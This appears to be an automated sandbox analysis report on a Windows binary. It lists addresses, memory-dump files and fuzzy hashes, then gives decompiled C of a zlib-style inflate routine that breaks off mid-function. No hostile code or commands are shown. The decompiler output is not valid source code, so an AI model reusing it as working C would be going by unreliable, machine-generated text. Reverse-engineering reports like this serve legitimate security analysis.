0x00000000
0x00407c03
0x00407c05
0x00407c0c
0x00407c15
0x00407c18
0x00407c1b
0x00407c21
0x00407c24
0x00407c35
0x00407c35
0x00000000
0x00000000
0x00407c39
0x00407c3f
0x00407c42
0x00407c49
0x00407c50
0x00407c55
0x00407c56
0x00407c57
0x00407c5b
0x00000000
0x00000000
0x004079ff
0x00407a02
0x00407a05
0x00407a06
0x00407a0d
0x00407a0f
0x00407a15
0x00407a31
0x00407b5d
0x00000000
0x00407a37
0x00407a3a
0x00000000
0x00407a40
0x00407a40
0x00407a43
0x00407a46
0x00407a49
0x00407a4b
0x00407a50
0x00407a56
0x00407a63
0x00000000
0x00407a58
0x00407a58
0x00000000
0x00407a58
0x00407a56
0x00407a3a
0x00407a17
0x00407a1a
0x00407a20
0x00407a23
0x00000000
0x00407a23
0x00000000
0x00000000
0x00407a69
0x00407a69
0x00407a6e
0x00000000
0x00407a74
0x00407a74
0x00407a76
0x00407a7d
0x00407a83
0x00407a89
0x00407a8c
0x00407a8f
0x00407a91
0x00407a94
0x00000000
0x00407a94
0x00000000
0x00000000
0x00407a9a
0x00407a9a
0x00407a9f
0x00000000
0x00407aa5
0x00407aa7
0x00407aae
0x00407ab1
0x00407ab4
0x00407ab7
0x00407aba
0x00407ac0
0x00407ac2
0x00407ac5
0x00000000
0x00407ac5
0x00000000
0x00000000
0x00407acb
0x00407acb
0x00407ad0
0x00000000
0x00407ad6
0x00407ad6
0x00407ad8
0x00407adf
0x00407ae5
0x00407aeb
0x00407aee
0x00407af1
0x00407af3
0x00407af6
0x00000000
0x00407af6
0x00000000
0x00000000
0x00407afc
0x00407afc
0x00407b01
0x00407b5f
0x00407b67
0x00407b03
0x00407b03
0x00407b05
0x00407b0c
0x00407b12
0x00407b15
0x00407b18
0x00407b1b
0x00407b1e
0x00407b21
0x00407b26
0x00407c5c
0x00407c5f
0x00000000
0x00407b2c
0x00407b2c
0x00407b32
0x00407b39
0x00407b3c
0x00000000
0x00407b3c
0x00407b26
0x00000000
0x00000000
0x00407c65
0x00407c65
0x00407c6a
0x00407c6b
0x00407c6c
0x00407c70
0x00000000
0x00000000
0x00407c71
0x00407c72
0x00407c73
0x00407c78
0x00407c7c
0x00000000
0x00000000
0x00407b43
0x00407b46
0x00407b48
0x00407922
0x00000000
0x00407909
0x00000000

Strings

\,D, xrefs: 00407C42
, xrefs: 004079E9

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $\,D
API String ID: 0-93706627
Opcode ID: 6174c0985be2b1bd4f6e6b0e5334443b8e1bd7e2436901987f9bbfbc43187618
Instruction ID: 814063d1772cb47c75e0d66a36cf57df31095ee1ddbf4c2ee9ba5347b342df7d
Opcode Fuzzy Hash: 6174c0985be2b1bd4f6e6b0e5334443b8e1bd7e2436901987f9bbfbc43187618
Instruction Fuzzy Hash: CAC1D4B1604A069FD314CF29C480721F7F1FF45328B25836AE9288B791D779F8A5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00405F80, Relevance: 2.0, Strings: 1, Instructions: 796
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00405F80(signed char** __eax, signed int* __ecx) {
				unsigned int __ebx;
				signed int* __esi;
				unsigned int _t382;
				signed char** _t388;
				intOrPtr _t391;
				signed int _t392;
				unsigned int _t406;
				signed int _t418;
				signed int* _t422;
				signed char* _t423;
				void* _t424;

				_t422 = __ecx;
				_t388 = __eax;
				_t423 =  *__eax;
				 *(_t424 + 0x10) =  *(__ecx + 0x34);
				_t391 =  *((intOrPtr*)(__ecx + 0x30));
				 *(_t424 + 0x14) = __eax[1];
				_t382 =  *(__ecx + 0x20);
				_t418 =  *(__ecx + 0x1c);
				 *(_t424 + 0x10) = _t382;
				if( *(_t424 + 0x10) >= _t391) {
					_t406 =  *((intOrPtr*)(__ecx + 0x2c)) -  *(_t424 + 0x14);
					 *(_t424 + 0x20) = _t406;
				} else {
					 *(_t424 + 0x20) = _t391 -  *(_t424 + 0x14) - 1;
				}
				_t392 =  *_t422;
				if(_t392 <= 9) {
					do {
						switch( *((intOrPtr*)(_t392 * 4 +  &M00406994))) {
							case 0:
								__eflags = _t418 - 3;
								if(_t418 >= 3) {
									L13:
									_t394 = _t382 & 0x00000007;
									_t395 = _t394 >> 1;
									__eflags = _t395 - 3;
									_t422[6] = _t394 & 0x00000001;
									if(_t395 > 3) {
										goto L100;
									} else {
										switch( *((intOrPtr*)(_t395 * 4 +  &M004069BC))) {
											case 0:
												goto L15;
											case 1:
												goto L16;
											case 2:
												goto L18;
											case 3:
												goto L106;
										}
									}
								} else {
									while(1) {
										__eflags =  *(_t424 + 0x18);
										if( *(_t424 + 0x18) == 0) {
											break;
										}
										 *(_t424 + 0x18) =  *(_t424 + 0x18) - 1;
										_t413 = ( *_t423 & 0x000000ff) << _t418;
										_t418 = _t418 + 8;
										_t423 =  &(_t423[1]);
										 *(_t424 + 0x4c) = 0;
										_t382 = _t382 | _t413;
										__eflags = _t418 - 3;
										 *(_t424 + 0x10) = _t382;
										if(_t418 < 3) {
											continue;
										} else {
											goto L13;
										}
										goto L128;
									}
									_t422[8] =  *(_t424 + 0x10);
									_t422[7] = _t418;
									_t388[1] = 0;
									goto L103;
								}
								goto L128;
							case 1:
								__eflags = __edi - 0x20;
								if(__edi >= 0x20) {
									L22:
									__ecx = __eax;
									__eax =  !__eax;
									__ecx = __ecx & 0x0000ffff;
									__eax = __eax >> 0x10;
									__eflags = __eax - __ecx;
									if(__eax != __ecx) {
										 *__esi = 9;
										 *(__ebx + 0x18) = "invalid stored block lengths";
										goto L109;
									} else {
										__eax = 0;
										__edi = 0;
										__eflags = __ecx;
										__esi[1] = __ecx;
										 *(__esp + 0x10) = 0;
										if(__ecx == 0) {
											__esi[6] =  ~(__esi[6]);
											asm("sbb ecx, ecx");
											__ecx =  ~(__esi[6]) & 0x00000007;
											 *__esi =  ~(__esi[6]) & 0x00000007;
										} else {
											__ecx = 2;
											 *__esi = 2;
										}
										goto L100;
									}
								} else {
									while(1) {
										__eflags =  *(__esp + 0x18);
										if( *(__esp + 0x18) == 0) {
											goto L107;
										}
										__edx =  *__ebp & 0x000000ff;
										 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
										__ecx = __edi;
										__edx = ( *__ebp & 0x000000ff) << __cl;
										__edi = __edi + 8;
										__ebp =  &(__ebp[1]);
										 *(__esp + 0x4c) = 0;
										__eax = __eax | __edx;
										__eflags = __edi - 0x20;
										 *(__esp + 0x10) = __eax;
										if(__edi < 0x20) {
											continue;
										} else {
											goto L22;
										}
										goto L128;
									}
									goto L107;
								}
								goto L128;
							case 2:
								__eflags =  *(__esp + 0x18);
								if( *(__esp + 0x18) == 0) {
									goto L110;
								} else {
									__eflags = __edx;
									if(__edx != 0) {
										L44:
										__eax = __esi[1];
										__ecx =  *(__esp + 0x18);
										__eflags = __eax - __ecx;
										 *(__esp + 0x4c) = 0;
										 *(__esp + 0x1c) = __eax;
										if(__eax > __ecx) {
											__eax = __ecx;
											 *(__esp + 0x1c) = __ecx;
										}
										__ecx =  *(__esp + 0x20);
										__eflags = __eax - __ecx;
										if(__eax > __ecx) {
											 *(__esp + 0x1c) = __ecx;
										}
										__edx =  *(__esp + 0x1c);
										 *(__esp + 0x14) = E0042D2F0(__ebx, __edi, __esi,  *(__esp + 0x14), __ebp,  *(__esp + 0x1c));
										__eax =  *(__esp + 0x28);
										 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
										 *(__esp + 0x20) =  *(__esp + 0x20) + __eax;
										 *(__esp + 0x2c) =  *(__esp + 0x2c) - __eax;
										__ebp =  &(__ebp[__eax]);
										_t97 =  &(__esi[1]);
										 *_t97 = __esi[1] - __eax;
										__eflags =  *_t97;
										if( *_t97 == 0) {
											__esi[6] =  ~(__esi[6]);
											asm("sbb ecx, ecx");
											__ecx =  ~(__esi[6]) & 0x00000007;
											 *__esi =  ~(__esi[6]) & 0x00000007;
										}
										goto L99;
									} else {
										__edx = __esi[0xb];
										__eflags =  *(__esp + 0x14) - __edx;
										if( *(__esp + 0x14) != __edx) {
											L34:
											__ecx =  *(__esp + 0x4c);
											__eax =  *(__esp + 0x14);
											__esi[0xd] =  *(__esp + 0x14);
											__eax = E00405690(__ebx, __esi,  *(__esp + 0x4c));
											__ecx = __esi[0xc];
											 *(__esp + 0x50) = __eax;
											__eax = __esi[0xd];
											__eflags = __eax - __ecx;
											 *(__esp + 0x14) = __eax;
											if(__eax >= __ecx) {
												__eax = __esi[0xb];
												__eax = __esi[0xb] -  *(__esp + 0x14);
												__eflags = __eax;
												 *(__esp + 0x20) = __eax;
												__edx = __eax;
											} else {
												__ecx = __ecx - __eax;
												__edx = __ecx - __eax - 1;
												 *(__esp + 0x20) = __edx;
											}
											__eax = __esi[0xb];
											__eflags =  *(__esp + 0x14) - __esi[0xb];
											if( *(__esp + 0x14) == __esi[0xb]) {
												__eax = __esi[0xa];
												__eflags = __eax - __ecx;
												if(__eflags != 0) {
													 *(__esp + 0x14) = __eax;
													if(__eflags >= 0) {
														__edx = __esi[0xb];
														__edx = __esi[0xb] - __eax;
														__eflags = __edx;
													} else {
														__ecx = __ecx - __eax;
														__edx = __ecx;
													}
													 *(__esp + 0x20) = __edx;
												}
											}
											__eflags = __edx;
											if(__edx == 0) {
												__eax =  *(__esp + 0x10);
												__ecx =  *(__esp + 0x18);
												__esi[8] =  *(__esp + 0x10);
												__esi[7] = __edi;
												 *(__ebx + 4) =  *(__esp + 0x18);
												L103:
												_t401 =  *(_t424 + 0x4c);
												goto L104;
											} else {
												goto L44;
											}
										} else {
											__eax = __esi[0xc];
											__ecx = __esi[0xa];
											__eflags = __ecx - __eax;
											if(__eflags == 0) {
												goto L34;
											} else {
												 *(__esp + 0x14) = __ecx;
												if(__eflags >= 0) {
													__edx = __edx - __ecx;
													__eflags = __edx;
													__eax = __edx;
													 *(__esp + 0x20) = __edx;
												} else {
													__eax = __eax - __ecx;
													__eax = __eax - 1;
													 *(__esp + 0x20) = __eax;
												}
												__eflags = __eax;
												if(__eax != 0) {
													goto L44;
												} else {
													goto L34;
												}
											}
										}
									}
								}
								goto L128;
							case 3:
								__eflags = __edi - 0xe;
								if(__edi >= 0xe) {
									L53:
									__eax = __eax & 0x00003fff;
									__ecx = __eax;
									__ecx = __eax & 0x0000001f;
									__eflags = __ecx - 0x1d;
									__esi[1] = __eax;
									if(__ecx > 0x1d) {
										L113:
										 *__esi = 9;
										 *(__ebx + 0x18) = "too many length or distance symbols";
										goto L109;
									} else {
										__eax = __eax >> 5;
										__eax = __eax & 0x0000001f;
										__eflags = __eax - 0x1d;
										if(__eax > 0x1d) {
											goto L113;
										} else {
											__edx =  *(__ebx + 0x20);
											__eax = __eax + __ecx + 0x102;
											__ecx =  *(__ebx + 0x28);
											_push(4);
											_push(__eax);
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x20))();
											__esp = __esp + 0xc;
											__eflags = __eax;
											__esi[3] = __eax;
											if(__eax == 0) {
												__eax =  *(__esp + 0x10);
												__ecx =  *(__esp + 0x18);
												__esi[8] =  *(__esp + 0x10);
												__eax =  *(__esp + 0x14);
												__esi[7] = __edi;
												__ebp = __ebp -  *__ebx;
												 *(__ebx + 4) =  *(__esp + 0x18);
												_t314 = __ebx + 8;
												 *_t314 =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
												__eflags =  *_t314;
												 *__ebx = __ebp;
												__esi[0xd] =  *(__esp + 0x14);
												__eax = E00405690(__ebx, __esi, 0xfffffffc);
												_pop(__edi);
												return __eax;
											} else {
												 *(__esp + 0x10) =  *(__esp + 0x10) >> 0xe;
												__eax =  *(__esp + 0x10);
												__edi = __edi - 0xe;
												__eflags = __edi;
												__esi[2] = 0;
												 *__esi = 4;
												goto L57;
											}
										}
									}
								} else {
									while(1) {
										__eflags =  *(__esp + 0x18);
										if( *(__esp + 0x18) == 0) {
											goto L110;
										}
										__edx =  *__ebp & 0x000000ff;
										 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
										__ecx = __edi;
										__edx = ( *__ebp & 0x000000ff) << __cl;
										__edi = __edi + 8;
										__ebp =  &(__ebp[1]);
										 *(__esp + 0x4c) = 0;
										__eax = __eax | __edx;
										__eflags = __edi - 0xe;
										 *(__esp + 0x10) = __eax;
										if(__edi < 0xe) {
											continue;
										} else {
											goto L53;
										}
										goto L128;
									}
									goto L110;
								}
								goto L128;
							case 4:
								L57:
								__esi[1] = __esi[1] >> 0xa;
								__ecx = (__esi[1] >> 0xa) + 4;
								__eflags = __esi[2] - (__esi[1] >> 0xa) + 4;
								if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
									L62:
									__eflags = __esi[2] - 0x13;
									if(__esi[2] < 0x13) {
										__eax = 1;
										do {
											__ecx = __esi[2];
											__edx =  *(0x444380 + __esi[2] * 4);
											__ecx = __esi[3];
											 *(__esi[3] +  *(0x444380 + __esi[2] * 4) * 4) = 0;
											__esi[2] = __esi[2] + 1;
											__eflags = __esi[2] - 0x13;
										} while (__esi[2] < 0x13);
									}
									__esi[9] = __esi[3];
									__ecx =  &(__esi[5]);
									__eax =  &(__esi[4]);
									__esi[4] = 7;
									__eax = E00406EB0(__ebx, __esi[3],  &(__esi[4]),  &(__esi[5]), __esi[9]);
									__eflags = __eax;
									 *(__esp + 0x1c) = __eax;
									if(__eax != 0) {
										__eflags =  *(__esp + 0x1c) - 0xfffffffd;
										if( *(__esp + 0x1c) == 0xfffffffd) {
											__eax = __esi[3];
											__ecx =  *(__ebx + 0x28);
											__edx =  *(__ebx + 0x24);
											_push(__esi[3]);
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x24))();
											__esp = __esp + 8;
											 *__esi = 9;
										}
										__eax =  *(__esp + 0x10);
										__ecx =  *(__esp + 0x18);
										__esi[8] =  *(__esp + 0x10);
										__esi[7] = __edi;
										 *(__ebx + 4) =  *(__esp + 0x18);
										__ecx =  *(__esp + 0x1c);
										L104:
										 *_t388 = _t423;
										_t273 =  &(_t388[2]);
										 *_t273 =  &(_t388[2][_t423 -  *_t388]);
										__eflags =  *_t273;
										_t422[0xd] =  *(_t424 + 0x14);
										return E00405690(_t388, _t422, _t401);
									} else {
										__esi[2] = __eax;
										__eax =  *(__esp + 0x10);
										 *__esi = 5;
										goto L67;
									}
								} else {
									do {
										__eflags = __edi - 3;
										if(__edi >= 3) {
											goto L61;
										} else {
											while(1) {
												__eflags =  *(__esp + 0x18);
												if( *(__esp + 0x18) == 0) {
													goto L110;
												}
												__edx =  *__ebp & 0x000000ff;
												 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
												__ecx = __edi;
												__edx = ( *__ebp & 0x000000ff) << __cl;
												__edi = __edi + 8;
												__ebp =  &(__ebp[1]);
												 *(__esp + 0x4c) = 0;
												__eax = __eax | __edx;
												__eflags = __edi - 3;
												 *(__esp + 0x10) = __eax;
												if(__edi < 3) {
													continue;
												} else {
													goto L61;
												}
												goto L128;
											}
											goto L110;
										}
										goto L128;
										L61:
										__ecx = __esi[2];
										__edx =  *(0x444380 + __esi[2] * 4);
										__ecx = __esi[3];
										 *(__esi[3] +  *(0x444380 + __esi[2] * 4) * 4) = __eax;
										__esi[2] = __esi[2] + 1;
										__edx = __esi[1];
										__eax =  *(__esp + 0x10);
										__edx = __esi[1] >> 0xa;
										__eax =  *(__esp + 0x10) >> 3;
										__edx = (__esi[1] >> 0xa) + 4;
										__edi = __edi - 3;
										__eflags = __esi[2] - (__esi[1] >> 0xa) + 4;
										 *(__esp + 0x10) = __eax;
									} while (__esi[2] < (__esi[1] >> 0xa) + 4);
									goto L62;
								}
								goto L128;
							case 5:
								L67:
								__ecx = __esi[1];
								__ecx = __ecx >> 5;
								__edx = __ecx >> 0x00000005 & 0x0000001f;
								_t153 = __ecx + 0x102; // 0x102
								__ecx = __edx + _t153;
								__eflags = __esi[2] - __edx + _t153;
								if(__esi[2] >= __edx + _t153) {
									L90:
									__ecx = __esi[9];
									__eax = __esi[1];
									__edx = __esp + 0x44;
									__ecx = __esp + 0x4c;
									__esp + 0x30 = __esi[3];
									__esp + 0x30 = __eax;
									__eax >> 5 = __eax >> 0x00000005 & 0x0000001f;
									__ecx = (__eax >> 0x00000005 & 0x0000001f) + 1;
									__eax = __eax + 0x101;
									__esi[5] = 0;
									 *(__esp + 0x40) = 9;
									 *(__esp + 0x44) = 6;
									__eax = E00406F50(__ebx, __eax, __ecx, __esi[3], __esp + 0x30, __esp + 0x30, __esp + 0x4c, __esp + 0x44, __esi[9]);
									__eflags = __eax;
									 *(__esp + 0x1c) = __eax;
									if(__eax != 0) {
										__eflags =  *(__esp + 0x1c) - 0xfffffffd;
										if( *(__esp + 0x1c) == 0xfffffffd) {
											__edx = __esi[3];
											__eax =  *(__ebx + 0x28);
											__ecx =  *(__ebx + 0x24);
											_push(__esi[3]);
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x24))();
											__esp = __esp + 8;
											 *__esi = 9;
										}
										__edx =  *(__esp + 0x10);
										__eax =  *(__esp + 0x18);
										__esi[8] =  *(__esp + 0x10);
										__esi[7] = __edi;
										 *(__ebx + 4) =  *(__esp + 0x18);
										__eax =  *(__esp + 0x1c);
										_push( *(__esp + 0x1c));
										goto L7;
									} else {
										__edx =  *(__esp + 0x40);
										__eax =  *(__esp + 0x44);
										__ecx =  *(__esp + 0x24);
										__edx =  *(__esp + 0x24);
										__eax = __ebx;
										__eax = E00405780(__ebx,  *(__esp + 0x24),  *(__esp + 0x24), __ebx,  *(__esp + 0x40));
										__eflags = __eax;
										if(__eax == 0) {
											__ecx =  *(__esp + 0x10);
											__edx =  *(__esp + 0x18);
											__esi[8] =  *(__esp + 0x10);
											__ecx =  *(__esp + 0x14);
											__esi[7] = __edi;
											__ebp = __ebp -  *__ebx;
											 *(__ebx + 4) =  *(__esp + 0x18);
											_t357 = __ebx + 8;
											 *_t357 =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
											__eflags =  *_t357;
											 *__ebx = __ebp;
											__esi[0xd] =  *(__esp + 0x14);
											__eax = E00405690(__ebx, __esi, 0xfffffffc);
											_pop(__edi);
											return __eax;
										} else {
											__esi[1] = __eax;
											__eax = __esi[3];
											__ecx =  *(__ebx + 0x28);
											__edx =  *(__ebx + 0x24);
											_push(__esi[3]);
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x24))();
											__esp = __esp + 8;
											 *__esi = 6;
											goto L93;
										}
									}
								} else {
									while(1) {
										__ecx = __esi[4];
										__eflags = __edi - __ecx;
										if(__edi >= __ecx) {
											goto L73;
										} else {
											goto L71;
										}
										while(1) {
											L71:
											__eflags =  *(__esp + 0x18);
											if( *(__esp + 0x18) == 0) {
												break;
											}
											__edx =  *__ebp & 0x000000ff;
											 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
											__ecx = __edi;
											__edx = ( *__ebp & 0x000000ff) << __cl;
											__ecx = __esi[4];
											__edi = __edi + 8;
											__ebp =  &(__ebp[1]);
											__eax = __eax | __edx;
											__eflags = __edi - __ecx;
											 *(__esp + 0x4c) = 0;
											 *(__esp + 0x10) = __eax;
											if(__edi < __ecx) {
												continue;
											} else {
												goto L73;
											}
											goto L128;
										}
										L110:
										__edx =  *(__esp + 0x10);
										__ecx =  *(__esp + 0x14);
										__esi[8] =  *(__esp + 0x10);
										__edx =  *(__esp + 0x4c);
										__esi[7] = __edi;
										__ebp = __ebp -  *__ebx;
										 *(__ebx + 4) = 0;
										_t300 = __ebx + 8;
										 *_t300 =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
										__eflags =  *_t300;
										 *__ebx = __ebp;
										__esi[0xd] =  *(__esp + 0x14);
										__eax = E00405690(__ebx, __esi,  *(__esp + 0x4c));
										_pop(__edi);
										return __eax;
										goto L128;
										L73:
										__ecx =  *(0x443238 + __ecx * 4);
										__edx = __esi[5];
										__edx = __esi[5] + __ecx * 8;
										__ecx =  *(__edx + 1) & 0x000000ff;
										__edx =  *(__edx + 4);
										__eflags = __edx - 0x10;
										 *(__esp + 0x1c) = __ecx;
										 *(__esp + 0x3c) = __edx;
										if(__edx >= 0x10) {
											__eflags = __edx - 0x12;
											if(__edx != 0x12) {
												_t180 = __edx - 0xe; // -14
												__ecx = _t180;
												 *(__esp + 0x24) = _t180;
											} else {
												 *(__esp + 0x24) = 7;
											}
											__ecx = 0;
											__eflags = __edx - 0x12;
											__edx =  *(__esp + 0x24);
											0 | __eflags == 0x00000000 = 3 + (__eflags == 0) * 8;
											 *(__esp + 0x20) = 3 + (__eflags == 0) * 8;
											__ecx =  *(__esp + 0x1c);
											__ecx =  *(__esp + 0x1c) +  *(__esp + 0x24);
											__eflags = __edi - __ecx;
											 *(__esp + 0x38) = __ecx;
											if(__edi >= __ecx) {
												L82:
												__ecx =  *(__esp + 0x1c);
												__eax = __eax >> __cl;
												__ecx =  *(__esp + 0x24);
												 *(0x443238 + __ecx * 4) =  *(0x443238 + __ecx * 4) & __eax;
												 *(__esp + 0x20) =  *(__esp + 0x20) + ( *(0x443238 + __ecx * 4) & __eax);
												 *(__esp + 0x10) = __eax;
												__eax =  *(__esp + 0x1c);
												__ecx = __ecx +  *(__esp + 0x1c);
												__eax = __esi[1];
												__eax = __eax >> 5;
												__edx = __eax >> 0x00000005 & 0x0000001f;
												_t206 = __eax + 0x102; // 0x102
												__eax = __edx + _t206;
												__edx =  *(__esp + 0x20);
												__edi = __edi - __ecx;
												__ecx = __esi[2];
												__edx =  *(__esp + 0x20) + __ecx;
												__eflags =  *(__esp + 0x20) + __ecx - __eax;
												if( *(__esp + 0x20) + __ecx > __eax) {
													L117:
													__ecx = __esi[3];
													__edx =  *(__ebx + 0x28);
													__eax =  *(__ebx + 0x24);
													_push(__esi[3]);
													_push( *(__ebx + 0x28));
													__eax =  *( *(__ebx + 0x24))();
													__ecx =  *(__esp + 0x18);
													__edx =  *(__esp + 0x20);
													 *__esi = 9;
													 *(__ebx + 0x18) = "invalid bit length repeat";
													__esi[8] =  *(__esp + 0x18);
													__ecx =  *(__esp + 0x1c);
													__esi[7] = __edi;
													__ebp = __ebp -  *__ebx;
													 *(__ebx + 4) =  *(__esp + 0x20);
													_t338 = __ebx + 8;
													 *_t338 =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
													__eflags =  *_t338;
													 *__ebx = __ebp;
													__esi[0xd] =  *(__esp + 0x1c);
													__eax = E00405690(__ebx, __esi, 0xfffffffd);
													_pop(__edi);
													return __eax;
												} else {
													__eflags =  *(__esp + 0x3c) - 0x10;
													if( *(__esp + 0x3c) != 0x10) {
														__eax = 0;
														goto L87;
													} else {
														__eflags = __ecx - 1;
														if(__ecx < 1) {
															goto L117;
														} else {
															__eax = __esi[3];
															__eax =  *(__esi[3] + __ecx * 4 - 4);
															do {
																L87:
																__edx = __esi[3];
																 *(__esi[3] + __ecx * 4) = __eax;
																__ecx = __ecx + 1;
																_t217 = __esp + 0x20;
																 *_t217 =  *(__esp + 0x20) - 1;
																__eflags =  *_t217;
															} while ( *_t217 != 0);
															__esi[2] = __ecx;
															goto L89;
														}
													}
												}
											} else {
												while(1) {
													__eflags =  *(__esp + 0x18);
													if( *(__esp + 0x18) == 0) {
														break;
													}
													__edx =  *__ebp & 0x000000ff;
													 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
													__ecx = __edi;
													__edx = ( *__ebp & 0x000000ff) << __cl;
													__edi = __edi + 8;
													__ebp =  &(__ebp[1]);
													 *(__esp + 0x4c) = 0;
													__eax = __eax | __edx;
													__eflags = __edi -  *(__esp + 0x38);
													 *(__esp + 0x10) = __eax;
													if(__edi <  *(__esp + 0x38)) {
														continue;
													} else {
														goto L82;
													}
													goto L128;
												}
												L107:
												__eax =  *(__esp + 0x10);
												__esi[8] =  *(__esp + 0x10);
												__eax =  *(__esp + 0x4c);
												__esi[7] = __edi;
												 *(__ebx + 4) = 0;
												_push( *(__esp + 0x4c));
												goto L7;
											}
										} else {
											__eax = __eax >> __cl;
											__edi = __edi - __ecx;
											__ecx = __esi[3];
											 *(__esp + 0x10) = __eax;
											__eax = __esi[2];
											 *(__esi[3] + __esi[2] * 4) = __edx;
											__esi[2] = __esi[2] + 1;
											L89:
											__eax = __esi[1];
											__eax = __eax >> 5;
											__ecx = __eax >> 0x00000005 & 0x0000001f;
											_t222 = __eax + 0x102; // 0x102
											__edx = __ecx + _t222;
											__eflags = __esi[2] - __ecx + _t222;
											if(__esi[2] < __ecx + _t222) {
												__eax =  *(__esp + 0x10);
												__ecx = __esi[4];
												__eflags = __edi - __ecx;
												if(__edi >= __ecx) {
													goto L73;
												} else {
													goto L71;
												}
											} else {
												goto L90;
											}
										}
										goto L128;
									}
								}
								goto L128;
							case 6:
								L93:
								__eax =  *(__esp + 0x10);
								__ecx =  *(__esp + 0x18);
								__esi[8] =  *(__esp + 0x10);
								__eax =  *(__esp + 0x14);
								__esi[7] = __edi;
								 *(__ebx + 4) =  *(__esp + 0x18);
								__ecx =  *(__esp + 0x4c);
								__ebp = __ebp -  *__ebx;
								 *__ebx = __ebp;
								 *(__ebx + 8) =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
								__esi[0xd] =  *(__esp + 0x14);
								_push( *(__esp + 0x4c));
								__eax = __ebx;
								__ecx = __esi;
								__eax = E004057C0(__ebx, __esi);
								__esp = __esp + 4;
								__eflags = __eax - 1;
								if(__eax != 1) {
									__eax = E00405690(__ebx, __esi, __eax);
									_pop(__edi);
									return __eax;
								} else {
									__ecx = __esi[1];
									__eax = __ebx;
									 *(__esp + 0x4c) = 0;
									E00405E60(__ebx, __esi[1]) = __esi[8];
									__ecx = __esi[0xd];
									__edx =  *(__ebx + 4);
									__ebp =  *__ebx;
									__edi = __esi[7];
									 *(__esp + 0x10) = __esi[8];
									__eax = __esi[0xc];
									__eflags = __ecx - __eax;
									 *(__esp + 0x18) = __edx;
									 *(__esp + 0x14) = __ecx;
									if(__ecx >= __eax) {
										__eax = __esi[0xb];
										__eax = __esi[0xb] - __ecx;
										__eflags = __eax;
									} else {
										__eax = __eax - __ecx;
										__eax = __eax - 1;
									}
									__eflags = __esi[6];
									 *(__esp + 0x20) = __eax;
									if(__esi[6] != 0) {
										 *__esi = 7;
										goto L124;
									} else {
										 *__esi = 0;
										goto L99;
									}
								}
								goto L128;
							case 7:
								L124:
								__eax =  *(__esp + 0x4c);
								__edx =  *(__esp + 0x14);
								__esi[0xd] =  *(__esp + 0x14);
								__eax = E00405690(__ebx, __esi,  *(__esp + 0x4c));
								__ecx = __esi[0xd];
								__eflags = __esi[0xc] - __ecx;
								 *(__esp + 0x14) = __ecx;
								if(__esi[0xc] == __ecx) {
									 *__esi = 8;
									goto L127;
								} else {
									__ecx =  *(__esp + 0x10);
									__edx =  *(__esp + 0x18);
									__esi[8] =  *(__esp + 0x10);
									__esi[7] = __edi;
									 *(__ebx + 4) =  *(__esp + 0x18);
									_push(__eax);
									goto L7;
								}
								goto L128;
							case 8:
								L127:
								__eax =  *(__esp + 0x10);
								__ecx =  *(__esp + 0x18);
								__esi[8] =  *(__esp + 0x10);
								__eax =  *(__esp + 0x14);
								__esi[7] = __edi;
								__ebp = __ebp -  *__ebx;
								 *(__ebx + 4) =  *(__esp + 0x18);
								_t377 = __ebx + 8;
								 *_t377 =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
								__eflags =  *_t377;
								 *__ebx = __ebp;
								__esi[0xd] =  *(__esp + 0x14);
								__eax = E00405690(__ebx, __esi, 1);
								_pop(__edi);
								return __eax;
								goto L128;
							case 9:
								L109:
								__ecx =  *(__esp + 0x10);
								__edx =  *(__esp + 0x18);
								__esi[8] =  *(__esp + 0x10);
								__ecx =  *(__esp + 0x14);
								__esi[7] = __edi;
								__ebp = __ebp -  *__ebx;
								 *(__ebx + 4) =  *(__esp + 0x18);
								_t291 = __ebx + 8;
								 *_t291 =  &((__ebp -  *__ebx)[ *(__ebx + 8)]);
								__eflags =  *_t291;
								 *__ebx = __ebp;
								__esi[0xd] =  *(__esp + 0x14);
								__eax = E00405690(__ebx, __esi, 0xfffffffd);
								_pop(__edi);
								return __eax;
								goto L128;
							case 0xa:
								L15:
								_t420 = _t418 - 3;
								_t399 = _t420 & 0x00000007;
								_t382 = _t382 >> 3 >> _t399;
								_t418 = _t420 - _t399;
								 *_t422 = 1;
								 *(_t424 + 0x10) = _t382;
								goto L100;
							case 0xb:
								L16:
								__eax = __esp + 0x28;
								__edx = __esp + 0x30;
								__ecx = __esp + 0x34;
								__esp + 0x38 = E004070E0(__esp + 0x38, __esp + 0x34, __esp + 0x30, __esp + 0x28);
								__ecx =  *(__esp + 0x2c);
								__edx =  *(__esp + 0x30);
								__eax =  *(__esp + 0x34);
								__ecx =  *(__esp + 0x38);
								__eax = __ebx;
								__eax = E00405780(__ebx,  *(__esp + 0x38), __ebx,  *(__esp + 0x30),  *(__esp + 0x2c));
								__eflags = __eax;
								__esi[1] = __eax;
								if(__eax == 0) {
									_push(0xfffffffc);
									goto L5;
								} else {
